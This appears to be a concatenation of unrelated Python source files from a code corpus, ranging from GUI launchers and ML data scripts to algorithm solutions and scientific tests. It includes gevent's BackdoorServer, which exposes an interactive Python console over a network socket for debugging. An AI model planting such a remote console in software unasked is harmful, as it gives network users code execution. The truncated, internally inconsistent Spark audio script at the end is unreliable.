file_set.rep_model_file_ctrl.file_ctrl.SetPath("") file_set.org_model_file_ctrl.file_ctrl.SetPath("") file_set.output_vmd_file_ctrl.file_ctrl.SetPath("") # フォーム無効化 def disable(self): self.file_set.disable() # フォーム無効化 def enable(self): self.file_set.enable() class MultiFileSetScrolledWindow(wx.ScrolledWindow): def __init__(self, *args, **kw): super().__init__(*args, **kw) def set_file_set_list(self, file_set_list): self.file_set_list = file_set_list def set_output_vmd_path(self, event, is_force=False): for file_set in self.file_set_list: file_set.set_output_vmd_path(event, is_force)
2.078125
2
androgui.py
nawfling/androguard
1
11811
<gh_stars>1-10 #!/usr/bin/env python """Androguard Gui""" import argparse import os import sys from androguard.core import androconf from androguard.gui.mainwindow import MainWindow from PyQt5 import QtWidgets, QtGui if __name__ == '__main__': parser = argparse.ArgumentParser(description="Androguard GUI") parser.add_argument("-d", "--debug", action="store_true", default=False) parser.add_argument("-i", "--input_file", default=None) parser.add_argument("-p", "--input_plugin", default=None) args = parser.parse_args() if args.debug: androconf.set_debug() # We need that to save huge sessions when leaving and avoid # RuntimeError: maximum recursion depth exceeded while pickling an object # or # RuntimeError: maximum recursion depth exceeded in cmp # http://stackoverflow.com/questions/2134706/hitting-maximum-recursion-depth-using-pythons-pickle-cpickle sys.setrecursionlimit(50000) app = QtWidgets.QApplication(sys.argv) app.setWindowIcon(QtGui.QIcon(os.path.join(androconf.CONF['data_prefix'], "androguard.ico"))) window = MainWindow(input_file=args.input_file, input_plugin=args.input_plugin) window.resize(1024, 768) window.show() sys.exit(app.exec_())
2.140625
2
python-trunk/sfapi2/sflib/ZSI/wstools/XMLname.py
raychorn/svn_molten-magma
0
11812
<gh_stars>0 """Translate strings to and from SOAP 1.2 XML name encoding Implements rules for mapping application defined name to XML names specified by the w3 SOAP working group for SOAP version 1.2 in Appendix A of "SOAP Version 1.2 Part 2: Adjuncts", W3C Working Draft 17, December 2001, <http://www.w3.org/TR/soap12-part2/#namemap> Also see <http://www.w3.org/2000/xp/Group/xmlp-issues>. Author: <NAME> <<EMAIL>> Date:: 2002-04-25 Version 0.9.0 """ ident = "$Id: XMLname.py 25 2006-05-24 18:12:14Z misha $" from re import * def _NCNameChar(x): return x.isalpha() or x.isdigit() or x=="." or x=='-' or x=="_" def _NCNameStartChar(x): return x.isalpha() or x=="_" def _toUnicodeHex(x): hexval = hex(ord(x[0]))[2:] hexlen = len(hexval) # Make hexval have either 4 or 8 digits by prepending 0's if (hexlen==1): hexval = "000" + hexval elif (hexlen==2): hexval = "00" + hexval elif (hexlen==3): hexval = "0" + hexval elif (hexlen==4): hexval = "" + hexval elif (hexlen==5): hexval = "000" + hexval elif (hexlen==6): hexval = "00" + hexval elif (hexlen==7): hexval = "0" + hexval elif (hexlen==8): hexval = "" + hexval else: raise Exception, "Illegal Value returned from hex(ord(x))" return "_x"+ hexval + "_" def _fromUnicodeHex(x): return eval( r'u"\u'+x[2:-1]+'"' ) def toXMLname(string): """Convert string to a XML name.""" if string.find(':') != -1 : (prefix, localname) = string.split(':',1) else: prefix = None localname = string T = unicode(localname) N = len(localname) X = []; for i in range(N) : if i< N-1 and T[i]==u'_' and T[i+1]==u'x': X.append(u'_x005F_') elif i==0 and N >= 3 and \ ( T[0]==u'x' or T[0]==u'X' ) and \ ( T[1]==u'm' or T[1]==u'M' ) and \ ( T[2]==u'l' or T[2]==u'L' ): X.append(u'_xFFFF_' + T[0]) elif (not _NCNameChar(T[i])) or (i==0 and not _NCNameStartChar(T[i])): X.append(_toUnicodeHex(T[i])) else: X.append(T[i]) return u''.join(X) def fromXMLname(string): """Convert XML name to unicode string.""" retval = sub(r'_xFFFF_','', string ) def fun( matchobj ): return _fromUnicodeHex( matchobj.group(0) ) retval = sub(r'_x[0-9A-Za-z]+_', fun, retval ) return retval
2.765625
3
mmtbx/validation/regression/tst_restraints.py
dperl-sol/cctbx_project
155
11813
<reponame>dperl-sol/cctbx_project<gh_stars>100-1000 from __future__ import absolute_import, division, print_function from libtbx.utils import null_out from libtbx import easy_pickle from six.moves import cStringIO as StringIO def run_validation(pdb_file, ignore_hd=True): from mmtbx.validation import restraints import mmtbx.command_line cmdline = mmtbx.command_line.load_model_and_data( args=[pdb_file], master_phil=mmtbx.command_line.generic_simple_input_phil(), process_pdb_file=True, require_data=False, out=null_out()) validation = restraints.combined( pdb_hierarchy=cmdline.pdb_hierarchy, xray_structure=cmdline.xray_structure, geometry_restraints_manager=cmdline.geometry, ignore_hd=ignore_hd) return validation def exercise_simple(): # extracted from 1lyz, with hydrogens from reduce pdb_in = """ ATOM 1 N LYS A 1 3.296 9.888 10.739 1.00 7.00 N ATOM 2 CA LYS A 1 2.439 10.217 9.791 1.00 6.00 C ATOM 3 C LYS A 1 2.439 11.997 9.160 1.00 6.00 C ATOM 4 O LYS A 1 2.637 12.656 10.107 1.00 8.00 O ATOM 5 CB LYS A 1 0.659 10.086 8.844 1.00 6.00 C ATOM 6 CG LYS A 1 0.198 10.415 8.086 1.00 6.00 C ATOM 7 CD LYS A 1 -1.187 10.086 8.212 1.00 6.00 C ATOM 8 CE LYS A 1 -2.175 10.086 7.264 1.00 6.00 C ATOM 9 NZ LYS A 1 -3.527 9.869 7.288 1.00 7.00 N ATOM 0 H1 LYS A 1 3.156 9.045 10.986 1.00 7.00 H ATOM 0 H2 LYS A 1 4.127 9.972 10.431 1.00 7.00 H ATOM 0 H3 LYS A 1 3.184 10.425 11.440 1.00 7.00 H ATOM 0 HA LYS A 1 2.772 9.314 9.912 1.00 6.00 H ATOM 0 HB2 LYS A 1 0.584 9.128 8.712 1.00 6.00 H ATOM 0 HB3 LYS A 1 0.046 10.323 9.557 1.00 6.00 H ATOM 0 HG2 LYS A 1 0.310 11.376 8.015 1.00 6.00 H ATOM 0 HG3 LYS A 1 0.563 10.027 7.276 1.00 6.00 H ATOM 0 HD2 LYS A 1 -1.193 9.186 8.573 1.00 6.00 H ATOM 0 HD3 LYS A 1 -1.516 10.674 8.910 1.00 6.00 H ATOM 0 HE2 LYS A 1 -2.097 10.964 6.860 1.00 6.00 H ATOM 0 HE3 LYS A 1 -1.857 9.444 6.610 1.00 6.00 H ATOM 0 HZ1 LYS A 1 -3.725 9.170 6.774 1.00 7.00 H ATOM 0 HZ2 LYS A 1 -3.787 9.706 8.123 1.00 7.00 H ATOM 0 HZ3 LYS A 1 -3.949 10.590 6.982 1.00 7.00 H ATOM 10 N VAL A 2 2.637 12.722 7.707 1.00 7.00 N ATOM 11 CA VAL A 2 2.307 14.172 7.580 1.00 6.00 C ATOM 12 C VAL A 2 0.857 14.041 6.949 1.00 6.00 C ATOM 13 O VAL A 2 0.659 13.843 5.875 1.00 8.00 O ATOM 14 CB VAL A 2 3.625 14.172 6.759 1.00 6.00 C ATOM 15 CG1 VAL A 2 3.494 15.491 6.317 1.00 6.00 C ATOM 16 CG2 VAL A 2 4.746 13.843 7.580 1.00 6.00 C ATOM 0 H VAL A 2 2.920 12.338 6.992 1.00 7.00 H ATOM 0 HA VAL A 2 2.195 14.925 8.181 1.00 6.00 H ATOM 0 HB VAL A 2 3.767 13.528 6.048 1.00 6.00 H ATOM 0 HG11 VAL A 2 4.250 15.721 5.755 1.00 6.00 H ATOM 0 HG12 VAL A 2 2.674 15.582 5.808 1.00 6.00 H ATOM 0 HG13 VAL A 2 3.467 16.087 7.081 1.00 6.00 H ATOM 0 HG21 VAL A 2 5.554 13.850 7.043 1.00 6.00 H ATOM 0 HG22 VAL A 2 4.827 14.495 8.294 1.00 6.00 H ATOM 0 HG23 VAL A 2 4.620 12.960 7.962 1.00 6.00 H END """ pdb_file = "tst_validate_restraints_simple.pdb" open(pdb_file, "w").write(pdb_in) v1 = run_validation(pdb_file, ignore_hd=True) out1 = StringIO() v1.show(out=out1) assert (""" ----------Chiral volumes---------- atoms ideal model delta sigma residual deviation A 1 LYS CA A 1 LYS N A 1 LYS C A 1 LYS CB 2.57 1.12 1.45 2.00e-01 5.25e+01 7.2*sigma """ in "\n".join([ l.rstrip() for l in out1.getvalue().splitlines() ])) s = easy_pickle.dumps(v1) v1p = easy_pickle.loads(s) out1p = StringIO() v1p.show(out=out1p) assert (out1.getvalue() == out1p.getvalue()) v2 = run_validation(pdb_file, ignore_hd=False) out2 = StringIO() v2.show(out=out2) assert (out2.getvalue() != out1.getvalue()) assert ("""\ A 1 LYS HA 110.00 57.00 53.00 3.00e+00 3.12e+02 17.7*sigma A 1 LYS N A 1 LYS CA """ in "\n".join([ l.rstrip() for l in out2.getvalue().splitlines() ])) # # C-alpha-only model (from 3b5d) pdb_raw = """\ CRYST1 115.100 43.700 76.400 90.00 108.10 90.00 C 1 2 1 8 ATOM 1 CA TYR A 6 -7.551 -11.355 -17.946 1.00148.04 C ATOM 2 CA LEU A 7 -8.052 -8.804 -20.730 1.00310.75 C ATOM 3 CA GLY A 8 -10.874 -6.691 -19.353 1.00158.95 C ATOM 4 CA GLY A 9 -9.359 -7.332 -15.966 1.00217.68 C ATOM 5 CA ALA A 10 -5.806 -6.508 -16.946 1.00239.12 C ATOM 6 CA ILE A 11 -7.024 -3.514 -18.905 1.00103.16 C ATOM 7 CA LEU A 12 -10.023 -2.071 -17.056 1.00230.80 C ATOM 8 CA ALA A 13 -7.313 -1.820 -14.420 1.00141.04 C """ pdb_file = "tst_validate_restraints_calpha.pdb" open(pdb_file, "w").write(pdb_raw) v1 = run_validation(pdb_file, ignore_hd=True) if (__name__ == "__main__"): exercise_simple() print("OK")
1.773438
2
Python/repeated-dna-sequences.py
sm2774us/leetcode_interview_prep_2021
0
11814
<reponame>sm2774us/leetcode_interview_prep_2021 # Time: O(n) # Space: O(n) import collections class Solution(object): def findRepeatedDnaSequences(self, s): """ :type s: str :rtype: List[str] """ dict, rolling_hash, res = {}, 0, [] for i in range(len(s)): rolling_hash = ((rolling_hash << 3) & 0x3fffffff) | (ord(s[i]) & 7) if rolling_hash not in dict: dict[rolling_hash] = True elif dict[rolling_hash]: res.append(s[i - 9: i + 1]) dict[rolling_hash] = False return res def findRepeatedDnaSequences2(self, s): """ :type s: str :rtype: List[str] """ l, r = [], [] if len(s) < 10: return [] for i in range(len(s) - 9): l.extend([s[i:i + 10]]) return [k for k, v in collections.Counter(l).items() if v > 1]
3.296875
3
recipe/app.py
Udayan-Coding/examples
1
11815
from flask import Flask, render_template, request app = Flask(__name__) @app.route("/") def hello(): return render_template("index.html", name="WORLD!") @app.route("/about") def about(): return render_template("about.html")
2.859375
3
step2.py
mosheliv/tfcollab1
0
11816
<reponame>mosheliv/tfcollab1<gh_stars>0 """ Usage: # From tensorflow/models/ # Create train data: python generate_tfrecord.py --csv_input=data/train_labels.csv --output_path=train.record # Create test data: python generate_tfrecord.py --csv_input=data/test_labels.csv --output_path=test.record """ from __future__ import division from __future__ import print_function from __future__ import absolute_import import os import io import pandas as pd import tensorflow as tf from PIL import Image from collections import namedtuple, OrderedDict def _int64_feature(value): return tf.train.Feature(int64_list=tf.train.Int64List(value=[value])) def _bytes_feature(value): return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) def _bytes_list_feature(value): return tf.train.Feature(bytes_list=tf.train.BytesList(value=value)) def _float_list_feature(value): return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def _int64_list_feature(value): return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) flags = tf.app.flags flags.DEFINE_string('image_dir', '', 'Path to the image directory') flags.DEFINE_string('csv_input', '', 'Path to the CSV input') flags.DEFINE_string('output_path', '', 'Path to output TFRecord') FLAGS = flags.FLAGS # TO-DO replace this with label map def class_text_to_int(row_label): if row_label == 'Blackbird': return 1 else: None def split(df, group): data = namedtuple('data', ['filename', 'object']) gb = df.groupby(group) return [data(filename, gb.get_group(x)) for filename, x in zip(gb.groups.keys(), gb.groups)] def create_tf_example(group, path): with tf.gfile.GFile(os.path.join(path, '{}'.format(group.filename)), 'rb') as fid: encoded_jpg = fid.read() encoded_jpg_io = io.BytesIO(encoded_jpg) image = Image.open(encoded_jpg_io) width, height = image.size filename = group.filename.encode('utf8') image_format = b'jpg' xmins = [] xmaxs = [] ymins = [] ymaxs = [] classes_text = [] classes = [] for index, row in group.object.iterrows(): xmins.append(row['xmin']) xmaxs.append(row['xmax']) ymins.append(row['ymin']) ymaxs.append(row['ymax']) classes_text.append(row['class'].encode('utf8')) classes.append(class_text_to_int(row['class'])) tf_example = tf.train.Example(features=tf.train.Features(feature={ 'image/height': _int64_feature(height), 'image/width': _int64_feature(width), 'image/filename': _bytes_feature(filename), 'image/source_id': _bytes_feature(filename), 'image/encoded': _bytes_feature(encoded_jpg), 'image/format': _bytes_feature(image_format), 'image/object/bbox/xmin': _float_list_feature(xmins), 'image/object/bbox/xmax': _float_list_feature(xmaxs), 'image/object/bbox/ymin': _float_list_feature(ymins), 'image/object/bbox/ymax': _float_list_feature(ymaxs), 'image/object/class/text': _bytes_list_feature(classes_text), 'image/object/class/label': _int64_list_feature(classes), })) return tf_example def main(_): writer = tf.python_io.TFRecordWriter(FLAGS.output_path) path = FLAGS.image_dir examples = pd.read_csv(FLAGS.csv_input) print(examples.columns.values) grouped = split(examples, 'filename') for group in grouped: tf_example = create_tf_example(group, path) writer.write(tf_example.SerializeToString()) writer.close() output_path = os.path.join(os.getcwd(), FLAGS.output_path) print('Successfully created the TFRecords: {}'.format(output_path)) if __name__ == '__main__': tf.app.run()
2.4375
2
lh_lib/sensors/esp32/touch.py
lh70/s-connect-python
0
11817
<gh_stars>0 from machine import Pin from lh_lib.sensors.sensor import AbstractSensor class Touch(AbstractSensor): """ This represents a touch sensor with integrated Logic, where there is only one output pin, which digitally represents the touched state. pin:integer can be one of all available GPIO pins: 0-19, 21-23, 25-27, 32-39 it is NOT recommended to pick one of the following pins: (1, 3) -> serial, (6, 7, 8, 11, 16, 17) -> embedded flash """ def __init__(self, pin=35): super().__init__() self.pin = Pin(pin, Pin.IN) """ sets 0 for LOW and 1 for HIGH """ def update(self): self.value = self.pin.value()
3.4375
3
algorithms/python/118.py
viing937/leetcode
3
11818
<filename>algorithms/python/118.py class Solution: def generate(self, numRows): """ :type numRows: int :rtype: List[List[int]] """ if numRows == 0: return [] rls = [[1]] for i in range(2, numRows+1): row = [1] * i for j in range(1, i-1): row[j] = rls[-1][j-1] + rls[-1][j] rls.append(row) return rls
3.609375
4
squeeze_and_excitation_networks/datasets/data_loader.py
younnggsuk/CV-Paper-Implementation
4
11819
import os import cv2 import albumentations as A from albumentations.pytorch import ToTensorV2 from torch.utils.data import Dataset, DataLoader from sklearn.model_selection import train_test_split __all__ = ['CatDogDataset', 'fetch_dataloader'] class CatDogDataset(Dataset): def __init__(self, file_paths, labels, transform=None): self.file_paths = file_paths self.labels = labels self.transform = transform def __len__(self): return len(self.file_paths) def __getitem__(self, idx): label = self.labels[idx] file_path = self.file_paths[idx] image = cv2.imread(file_path) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) if self.transform: transformed = self.transform(image=image) image = transformed["image"] return image, label def fetch_dataloader(types, data_dir, batch_size, num_workers): dataloaders = {} train_dir = os.path.join(data_dir, "train") train_files = sorted(os.listdir(train_dir)) train_labels = [] for file in train_files: if "cat" in file: train_labels.append(0) else: train_labels.append(1) train_file_paths = [os.path.join(train_dir, path) for path in train_files] train_file_paths, val_file_paths, train_labels, val_labels = train_test_split( train_file_paths, train_labels, stratify=train_labels, random_state=42 ) train_transform = A.Compose([ A.SmallestMaxSize(max_size=256), A.HorizontalFlip(p=0.5), A.RandomCrop(224, 224), A.Normalize(), ToTensorV2() ]) eval_transform = A.Compose([ A.SmallestMaxSize(max_size=256), A.CenterCrop(224, 224), A.Normalize(), ToTensorV2() ]) for split in ['train', 'val', 'test']: if split in types: if split == 'train': dl = DataLoader(CatDogDataset(train_file_paths, train_labels, train_transform), batch_size, shuffle=True, num_workers=num_workers) elif split == "val": dl = DataLoader(CatDogDataset(val_file_paths, val_labels, eval_transform), batch_size, shuffle=False, num_workers=num_workers) dataloaders[split] = dl return dataloaders
2.546875
3
seq2seq_utils.py
mumbihere/summarizer
0
11820
<reponame>mumbihere/summarizer from keras.preprocessing.text import text_to_word_sequence from keras.models import Sequential from keras.layers import Activation, TimeDistributed, Dense, RepeatVector, recurrent, Embedding from keras.layers.recurrent import LSTM from keras.optimizers import Adam, RMSprop from nltk import FreqDist import numpy as np import os import datetime def load_data(source, dist, max_len, vocab_size): # Reading raw text from source and destination files f = open(source, 'r') X_data = f.read() f.close() f = open(dist, 'r') y_data = f.read() f.close() # Splitting raw text into array of sequences X = [text_to_word_sequence(x)[::-1] for x, y in zip(X_data.split('\n'), y_data.split('\n')) if len(x) > 0 and len(y) > 0 and len(x) <= max_len and len(y) <= max_len] y = [text_to_word_sequence(y) for x, y in zip(X_data.split('\n'), y_data.split('\n')) if len(x) > 0 and len(y) > 0 and len(x) <= max_len and len(y) <= max_len] # Creating the vocabulary set with the most common words dist = FreqDist(np.hstack(X)) X_vocab = dist.most_common(vocab_size-1) dist = FreqDist(np.hstack(y)) y_vocab = dist.most_common(vocab_size-1) # Creating an array of words from the vocabulary set, we will use this array as index-to-word dictionary X_ix_to_word = [word[0] for word in X_vocab] # Adding the word "ZERO" to the beginning of the array X_ix_to_word.insert(0, 'ZERO') # Adding the word 'UNK' to the end of the array (stands for UNKNOWN words) X_ix_to_word.append('UNK') # Creating the word-to-index dictionary from the array created above X_word_to_ix = {word:ix for ix, word in enumerate(X_ix_to_word)} # Converting each word to its index value for i, sentence in enumerate(X): for j, word in enumerate(sentence): if word in X_word_to_ix: X[i][j] = X_word_to_ix[word] else: X[i][j] = X_word_to_ix['UNK'] y_ix_to_word = [word[0] for word in y_vocab] y_ix_to_word.insert(0, 'ZERO') y_ix_to_word.append('UNK') y_word_to_ix = {word:ix for ix, word in enumerate(y_ix_to_word)} for i, sentence in enumerate(y): for j, word in enumerate(sentence): if word in y_word_to_ix: y[i][j] = y_word_to_ix[word] else: y[i][j] = y_word_to_ix['UNK'] return (X, len(X_vocab)+2, X_word_to_ix, X_ix_to_word, y, len(y_vocab)+2, y_word_to_ix, y_ix_to_word) def load_test_data(source, X_word_to_ix, max_len): f = open(source, 'r') X_data = f.read() f.close() X = [text_to_word_sequence(x)[::-1] for x in X_data.split('\n') if len(x) > 0 and len(x) <= max_len] for i, sentence in enumerate(X): for j, word in enumerate(sentence): if word in X_word_to_ix: X[i][j] = X_word_to_ix[word] else: X[i][j] = X_word_to_ix['UNK'] return X def create_model(X_vocab_len, X_max_len, y_vocab_len, y_max_len, hidden_size, num_layers): model = Sequential() # Creating encoder network model.add(Embedding(X_vocab_len, 1000, input_length=X_max_len, mask_zero=True)) model.add(LSTM(hidden_size)) model.add(RepeatVector(y_max_len)) # Creating decoder network for _ in range(num_layers): model.add(LSTM(hidden_size, return_sequences=True)) model.add(TimeDistributed(Dense(y_vocab_len))) model.add(Activation('softmax')) model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) return model def process_data(word_sentences, max_len, word_to_ix): # Vectorizing each element in each sequence sequences = np.zeros((len(word_sentences), max_len, len(word_to_ix))) for i, sentence in enumerate(word_sentences): for j, word in enumerate(sentence): sequences[i, j, word] = 1. return sequences def find_checkpoint_file(folder): checkpoint_file = [f for f in os.listdir(folder) if 'checkpoint' in f] if len(checkpoint_file) == 0: return [] modified_time = [os.path.getmtime(f) for f in checkpoint_file] return checkpoint_file[np.argmax(modified_time)]
2.765625
3
SAMAE/data/__init__.py
Lisa-pa/SAMAE
0
11821
<reponame>Lisa-pa/SAMAE """Standard test images. """ import os from skimage.io import imread data_dir = os.path.abspath(os.path.dirname(__file__)) __all__ = ['data_dir', 'circle', 'skmuscimg'] def _load(f, as_gray=False): """Load an image file located in the data directory. Parameters ---------- f : string File name. as_gray : bool, optional Whether to convert the image to grayscale. Returns ------- img : ndarray Image loaded from ``data_dir``. """ # importing io is quite slow since it scans all the backends # we lazy import it here return imread(f, as_gray=as_gray) def circle(): """Synthetic image of a circle Returns ------- circle : (xdim, ydim) bool ndarray Circle image. """ return _load(os.path.join(data_dir, "circle.bmp")) def skmuscimg(): """Cropped US image of a musculoskeletal muscle """ return _load(os.path.join(data_dir, "skmuscle.jpg")) def panoimg(): """Panoramic US image of a musculoskeletal muscle """ return _load(os.path.join(data_dir, "panoramic_echo.jpg")) def simpleimg(): """Simple US image of a musculoskeletal muscle """ return _load(os.path.join(data_dir, "simple_echo.jpg")) def downloadFromDropbox(tok, path2file): """Download an image from a Dropbox account. Args: tok (string): access token that connects to the wanted app in Dropbox account path2file (string): Path of the file to download, in the app corresponding to the above token. Output: image (numpy.ndarray): 3-channel color image, with coefficients' type == uint8 Example: 1) Register a new app in the App Console of your Dropbox account. Set up parameters as you want. 2) In Dropbox>Applications>MyApp, import your data. 3) In the settings page of MyApp, generate a token and copy it. It should look like a random string of letters and figures, as below. (!!!This access token can be used to access your account via the API. Don’t share your access token with anyone!!!) > token = '<KEY>' //token not available anymore > path = '/cropped_20181002_153426_image.jpg' > dt = downloadFromDropbox(token, path); """ import dropbox import numpy as np import cv2 dbx = dropbox.Dropbox(tok) try: metadata, file = dbx.files_download(path2file) except dropbox.exceptions.HttpError as err: print('*** HTTP error', err) return None data = np.frombuffer(file.content, np.uint8) image = cv2.imdecode(data, 1) return image
2.8125
3
pandas_support/test_pandas_support.py
quanbingDG/sharper
0
11822
<filename>pandas_support/test_pandas_support.py<gh_stars>0 # -*- coding: utf-8 -*- # @Time : 2020/11/9 9:13 下午 # @Author : quanbing # @Email : <EMAIL> import pandas as pd import numpy as np from unittest import TestCase from pandas_support import PandasSupport as PS # @File : test_pandas_support.py class TestPandasSupport(TestCase): def setUp(self) -> None: self._test_frame = pd.DataFrame(np.array([1, 2, 3, 4]).reshape(2, 2), columns=['i1', 'i2']) def test_check_cols(self): self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1']), True) self.assertEqual(PS.check_cols(['col1', 'col2'], ['col']), False) self.assertEqual(PS.check_cols(['col1', 'col2'], ['col1', 'col3']), False) self.assertEqual(PS.check_cols(['col1', 'col2'], 'col1'), True) def test_add_ratio(self): self.assertEqual(PS.add_ratio(self._test_frame, ['i1']).columns.__len__(), 3) self.assertEqual(PS.add_ratio(self._test_frame, ['i1'], csum=True).columns.__len__(), 4) def test_add_csum(self): self.assertEqual(PS.add_csum(self._test_frame, 'i1').columns.__len__(), 3)
2.640625
3
08-About_scrapy/douban/main.py
jiaxiaochu/spider
0
11823
<reponame>jiaxiaochu/spider # !/Library/Frameworks/Python.framework/Versions/3.7/bin/python3 # -*- coding:utf-8 -*- # @Author : Jiazhixiang # 导入cmdline模块,可以实现控制终端命令行。 from scrapy import cmdline # 用execute()方法,输入运行scrapy的命令。 cmdline.execute(['scrapy', 'crawl', 'douban'])
1.421875
1
DynamicProgramming/longestIncreasingSubsequence.py
suyash248/data_structures
7
11824
<reponame>suyash248/data_structures from Array import empty_1d_array """ input array : [10, 22, 9, 33, 21, 50, 41, 60] # Element at each index `i` is representing length of longest LIS from index 0 to i in input array. output array: [1, 2, 1, 3, 2, 4, 4, 5] """ # Time complexity: O(n^2) # Space complexity: O(n) def lis_dp(arr): # Length of LIS at each index is at least 1 (element itself). n = len(arr) lis_arr = empty_1d_array(n, 1) for i in xrange(1, n): # for i=1; i<n; i++ for j in xrange(0, i): # for j=0; j<i; j++ if arr[i] > arr[j] : # and lis_arr[i] < lis_arr[j]+1: prev_lis_till_i = lis_arr[i] curr_lis_till_i = lis_arr[j] + 1 if curr_lis_till_i > prev_lis_till_i: # Update lis_till_i lis_arr[i] = curr_lis_till_i # print lis_arr return max(lis_arr) if __name__ == '__main__': arr = [10, 22, 9, 33, 21, 50, 41, 60] max_lis = lis_dp(arr) print "Length of longest increasing sub-sequence for given array is {}".format(max_lis)
3.71875
4
venv/Lib/site-packages/gevent/backdoor.py
Kiiwi/Syssel
0
11825
<reponame>Kiiwi/Syssel # Copyright (c) 2009-2014, gevent contributors # Based on eventlet.backdoor Copyright (c) 2005-2006, <NAME> from __future__ import print_function import sys from code import InteractiveConsole from gevent import socket from gevent.greenlet import Greenlet from gevent.hub import PY3, PYPY, getcurrent from gevent.server import StreamServer if PYPY: import gc __all__ = ['BackdoorServer'] try: sys.ps1 except AttributeError: sys.ps1 = '>>> ' try: sys.ps2 except AttributeError: sys.ps2 = '... ' class _Greenlet_stdreplace(Greenlet): _fileobj = None def switch(self, *args, **kw): if self._fileobj is not None: self.switch_in() Greenlet.switch(self, *args, **kw) def switch_in(self): self.saved = sys.stdin, sys.stderr, sys.stdout sys.stdin = sys.stdout = sys.stderr = self._fileobj def switch_out(self): sys.stdin, sys.stderr, sys.stdout = self.saved self.saved = None def run(self): try: return Greenlet.run(self) finally: # XXX why is this necessary? self.switch_out() class BackdoorServer(StreamServer): """Provide a backdoor to a program for debugging purposes. You may bind to any interface, but for security purposes it is recommended that you bind to 127.0.0.1. Basic usage: >> from gevent.backdoor import BackdoorServer >> server = BackdoorServer(('127.0.0.1', 5001), ... locals={'foo': "From defined scope!"}) >> server.serve_forever() In a another terminal, connect with... $ telnet 127.0.0.1 5001 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. Python 2.7.5 (default, May 12 2013, 12:00:47) [GCC 4.8.0 20130502 (prerelease)] on linux2 Type "help", "copyright", "credits" or "license" for more information. (InteractiveConsole) >> print foo From defined scope! """ def __init__(self, listener, locals=None, banner=None, **server_args): StreamServer.__init__(self, listener, spawn=_Greenlet_stdreplace.spawn, **server_args) self.locals = locals self.banner = banner self.stderr = sys.stderr def handle(self, conn, address): f = getcurrent()._fileobj = _fileobject(conn) f.stderr = self.stderr getcurrent().switch_in() try: console = InteractiveConsole(self.locals) # __builtins__ may either be the __builtin__ module or # __builtin__.__dict__ in the latter case typing # locals() at the backdoor prompt spews out lots of # useless stuff try: import __builtin__ console.locals["__builtins__"] = __builtin__ except ImportError: import builtins console.locals["builtins"] = builtins console.locals['__builtins__'] = builtins console.interact(banner=self.banner) except SystemExit: # raised by quit() if not PY3: sys.exc_clear() finally: conn.close() f.close() if PYPY: # The underlying socket somewhere has a reference # that's not getting closed until finalizers run. # Without running them, test__backdoor.Test.test_sys_exit # hangs forever gc.collect() class _fileobject(socket._fileobject): if not PY3: def write(self, data): self._sock.sendall(data) else: def write(self, data): if isinstance(data, str): data = data.encode('utf-8') self._sock.sendall(data) def isatty(self): return True def flush(self): pass def _readline(self, *a): return socket._fileobject.readline(self, *a).replace(b"\r\n", b"\n") if not PY3: readline = _readline else: def readline(self, *a): line = self._readline(*a) return line.decode('utf-8') if __name__ == '__main__': if not sys.argv[1:]: print('USAGE: %s PORT' % sys.argv[0]) else: BackdoorServer(('127.0.0.1', int(sys.argv[1])), locals={'hello': 'world'}).serve_forever()
2.3125
2
spark/par_decompress_audio.py
droyston/spectralize
0
11826
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Jun 17 16:12:56 2020 @author: dylanroyston """ # import/configure packages import numpy as np import pandas as pd #import pyarrow as pa import librosa import librosa.display from pathlib import Path #import Ipython.display as ipd #import matplotlib.pyplot as plt from pyspark.sql import * import pyspark.sql.functions as f from pyspark import SparkConf, SparkContext, SQLContext import boto3 from tinytag import TinyTag as tt import soundfile as sf import audioread from pydub import AudioSegment from io import BytesIO #from io import BytesIO import os import sys import time import struct sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/lib") #import config time_seq = [] ##### # create local Spark instance (for non-cluster dev) sc = SparkContext('local') spark = SparkSession (sc) spark.conf.set("spark.sql.execution.arrow.enabled", "true") # define Spark config def spark_conf(): conf = SparkConf().setAppName("decompress_audio_files") sc = SparkContext(conf=conf) spark = SparkSession.builder.getOrCreate() return spark spark = spark_conf() spark.conf.set("spark.sql.execution.arrow.enabled", "true") ##### # Function to write spark-dataframe to mySQL def write_df_to_psql(df, tablename): psql_user = os.environ.get('PSQL_USR') psql_pwd = os.environ.get('PSQL_PWD') df.write.format('jdbc').options( url='jdbc:postgresql://10.0.0.6:5432/spectralize', dbtable=tablename, user=psql_user, #password=<PASSWORD>).mode('append').save() password=psql_pwd).save() ##### # function to read audio files from S3 bucket and extract tags def read_audio_files(): # basic initialization time_seq.append(['start-read-audio', time.time()]) # DataFrame schema File_Tags = Row("s3_key", "song_id", "album", "albumartist", "artist", "audio_offset", "bitrate", "channels", "comment", "composer", "disc", "disc_total", "duration", "filesize", "genre", "samplerate", "title", "track", "track_total", "year") spec_labels = [] for sn in range(0,128): spec_labels.append('spec' + str(sn+1)) spec_df_labels = ['song_id','timeseries'] + spec_labels Spec_Tags = Row(spec_df_labels) # configure S3 access s3_bucket = 'mdp-spectralize-pal' number_of_files = 0 s3 = boto3.resource('s3') boto_client = boto3.client('s3') bucket = s3.Bucket(s3_bucket) number_of_files=0 file_limit=100 #local_path = './local_file.' known_ext = [".mp3", ".wav", ".m4a"] #read each file from S3 bucket for obj in bucket.objects.all(): s3_key = obj.key audio_obj_stream = boto_client.get_object(Bucket=s3_bucket, Key=s3_key) audio_obj = BytesIO(audio_obj_stream['Body'].read()) song = bytes(audio_obj) song = sf.SoundFile(audio_obj) song = open(audio_obj, 'rb').read() song = audioread.audio_open(audio_obj) # extract tags from mp3 files #if "mp3" in s3_key: #if any(ext in s3_key for ext in known_ext): #print(number_of_files) #ext = s3_key[-4:] #local_path = './localfile' + ext number_of_files+=1 #bucket.download_file(s3_key, local_path) local_path = '/home/dylanroyston/Music/spectralize_data/01 Konoha Densetsu.mp3' song = open(local_path, 'rb').read() ##### tags tags = tt.get(local_path) tags = tt.get(audio_obj) # extract tags from tinytag object indiv_tags = (s3_key, number_of_files, tags.album, tags.albumartist, tags.artist, tags.audio_offset, tags.bitrate, tags.channels, tags.comment, 